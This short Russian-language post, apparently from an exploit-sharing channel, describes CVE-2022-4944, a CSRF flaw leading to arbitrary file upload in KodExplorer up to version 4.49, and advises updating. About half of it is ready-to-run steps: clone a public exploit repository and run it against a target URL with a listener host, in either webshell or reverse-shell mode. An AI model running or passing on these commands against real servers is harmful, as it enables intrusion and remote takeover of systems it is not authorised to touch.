
「💥」CVE-2022-4944: KodExplorer <= 4.49 — CSRF к произвольной загрузке файлов

Уязвимость, классифицированная как проблемная, была обнаружена в kalcaddle KodExplorer до версии 4.49. Затрагивается неизвестная часть. Манипуляция приводит к межсайтовой подделке запросов. Данная уязвимость однозначно идентифицируется как CVE-2022-4944. Атаку можно инициировать удаленно. Кроме того, существует эксплойт. Рекомендуется обновить затронутый компонент.

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode